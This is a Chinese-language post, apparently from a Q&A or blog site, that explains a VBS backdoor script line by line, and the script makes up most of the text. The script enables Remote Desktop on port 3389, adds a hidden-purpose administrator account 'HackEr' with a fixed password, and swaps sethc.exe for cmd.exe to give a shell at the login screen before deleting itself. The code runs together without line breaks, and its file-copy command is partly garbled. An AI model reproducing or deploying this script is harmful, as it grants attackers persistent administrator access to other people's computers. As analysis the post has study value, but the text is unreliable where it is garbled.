Simone解释一个VBS脚本病毒代码
的有关信息介绍如下:
'容错on error resume next'定义一个常量 是一个注册表的键值const HKEY_LOCAL_MACHINE = &H80000002'定义一个变量strComputer 值为.strComputer = "."Set StdOut = WScript.StdOutSet oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_strComputer & "\root\default:StdRegProv")'创建组件 是关于注册表的组件strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPathstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPathstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"strValueName = "fDenyTSConnections"dwValue = 0oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValuestrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"strValueName = "PortNumber"dwValue = 3389oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValuestrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"strValueName = "PortNumber"dwValue = 3389oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue'上面这段的功能是开启3389端口 也就是开启远程终端 方法是修改注册表的键值'容错on error resume next'定义变量 username password dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath'这段是增加管理员 用户名是HackEr 密码是393214425'容错On Error Resume NextDim obj, successSet obj = CreateObject("WScript.Shell")success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F? %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe? %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)'这段是留后门 放大镜后门 将sethc.exe替换为cmd.exe 这样 在登陆界面这里 按5下shift就会出现cmd窗口 然后添加用户即可登陆系统总结 这个不算是病毒 充其量 只不过是一个后门程序 运行之后 系统的远程终端开启,自动加入一个HackEr的帐号 自动添加一个放大镜后门 个人感觉 这代码是将3段代码拼凑起来的 - - 没技术含量
